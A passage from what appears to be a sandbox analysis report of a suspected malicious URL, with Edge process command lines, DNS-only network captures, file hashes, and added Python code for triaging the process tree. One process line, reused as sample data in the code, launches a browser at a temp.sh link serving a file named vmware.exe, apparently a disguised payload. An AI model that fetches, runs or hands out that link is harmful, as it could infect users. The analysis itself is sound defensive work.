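        print(f'{r["src"]:>5} -> {r["dst"]:<5} x{r["count"]:<3} {r["verdict"]:<11} '
              f'{PureWindowsPath(r["src_img"]).name} -> {PureWindowsPath(r["dst_img"]).name}')
```

Run against the report's own rows the output is four "expected" entries; only the constructed sample.exe -> svchost.exe row comes back as "investigate", which is the shape of event that would actually matter in a run where the payload executed.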

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaf6753cb8,0x7ffaf6753cc8,0x7ffaf6753cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
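To see at a glance what actually ran, the process list can be parsed for the Chromium switches that matter for triage: --type, --utility-sub-type and --service-sandbox-type (a value of none means that service runs outside the renderer/utility sandbox). The Python below is an added example, not code from the sandbox; its input is a constructed, abridged copy of the listing above (most long switches dropped), and the path test in is_browser_image is an assumption tailored to this report's Edge and Internet Explorer paths.

```python
import re

# Constructed sample in the report's "Processes" layout: image path, blank line,
# full command line, blank line. Edge command lines are abridged.
PROCESS_LISTING = r'''
C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --lang=en-US --renderer-client-id=6 --mojo-platform-channel-handle=3176 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8
'''

# Only the switches needed to classify a Chromium child process.
SWITCH_RE = re.compile(r"--(type|utility-sub-type|service-sandbox-type)=([^\s\"]+)")


def is_browser_image(image):
    """Assumption for this report: anything under Edge's or IE's install path is the browser itself."""
    p = image.lower()
    return "\\microsoft\\edge\\application\\" in p or "\\internet explorer\\" in p


def parse_process_listing(text):
    """Pair each image path with its command line and pull out the sandbox-relevant switches."""
    items = [s.strip() for s in re.split(r"\n\s*\n", text.strip()) if s.strip()]
    procs = []
    for image, cmdline in zip(items[0::2], items[1::2]):
        switches = dict(SWITCH_RE.findall(cmdline))
        procs.append({
            "image": image,
            "cmdline": cmdline,
            # No --type on a browser image means the main (broker) process.
            "type": switches.get("type") or ("browser" if is_browser_image(image) else "other"),
            "service": switches.get("utility-sub-type"),
            "sandbox": switches.get("service-sandbox-type"),
        })
    return procs


def unsandboxed_services(procs):
    """Chromium utility services launched with --service-sandbox-type=none."""
    return [p["service"] for p in procs if p["sandbox"] == "none"]


def non_browser_images(procs):
    """Everything in the tree that is not the browser: where a dropped payload would appear."""
    return sorted({p["image"].rsplit("\\", 1)[-1] for p in procs if not is_browser_image(p["image"])})


if __name__ == "__main__":
    procs = parse_process_listing(PROCESS_LISTING)
    for p in procs:
        print(f'{p["type"]:<8} {p["sandbox"] or "-":<8} {p["image"].rsplit(chr(92), 1)[-1]} {p["service"] or ""}')
    print("unsandboxed services:", unsandboxed_services(procs))
    print("non-browser images:", non_browser_images(procs))
```

On this report's listing the only non-browser image is CompPkgSrv.exe, a COM server started with -Embedding; the sample itself never appears, and the three unsandboxed services (network, WinRT app-id helper, UtilWin) are Edge's own.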

Network

Country Destination Domain Proto
US 8.8.8.8:53 temp.sh udp
N/A 224.0.0.251:5353 N/A udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 temp.sh udp

Only DNS lookups (plus one mDNS multicast to 224.0.0.251:5353) were captured in this run. temp.sh was resolved twice but no TCP connection to it is recorded, so this detonation shows no download of https://temp.sh/WwJqO/vmware.exe; the process and file lists are consistent with that.

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0c705388d79c00418e5c1751159353e3
SHA1 aaeafebce5483626ef82813d286511c1f353f861
SHA256 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d
SHA512 c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

\??\pipe\LOCAL\crashpad_1416_NIBMKNXIMCGIGTNN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

(These are the digests of empty input: the sandbox read zero bytes from Edge's Crashpad named pipe, so this entry is not a dropped file.)

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0d84d1490aa9f725b68407eab8f0030e
SHA1 83964574467b7422e160af34ef024d1821d6d1c3
SHA256 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e
SHA512 f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2e4442b081188e42b8ea40d30af0532c
SHA1 5b2c157cb36185e1a48818d79247af750c4b6c29
SHA256 0e3ff0941d987c89dc459588b078286c0c378cd2a645cb33027395f7696a8d6d
SHA512 0c4cc1039043364f9c67bbb347fe6ea44cc18eab9e3f8b0c3953c6eeec116871dd14d19af8c9565b452c3754dcebf76a2cb67b1fa3859b15f7efe81231c737cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 05297ed94f8a538b4c787b9744b5f742
SHA1 9e62192c49316c0c2ce50aad0c4acd81c82b976b
SHA256 86c9502365aed6d55f7ca248f0e9467ec48e3a39f92d9e3a7269f226887c08c1
SHA512 17075987f3dc37b4ef672ad8ab77639e17f439589797da38a7c0fded0aeca47d3f6a5916abd642363cb623dd725ad70b95720866c6c6fff4df58dec9c9644e22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1fff045669ea8d7bcff5d88651e935f4
SHA1 e72a416e2ba5dda787401df585380c82700ab25f
SHA256 56983270174507e523767399add4f8965ef5ae744065ff03f3ab547afbc818c4
SHA512 4c07f0ce5c223c22bcb784b9df4eea7dca28c7edb0cd1ac91458b59750f86a8223c28b392de54c306d364834e01ec06f1ffc9d4fc6e88ff6536889c8e34156a2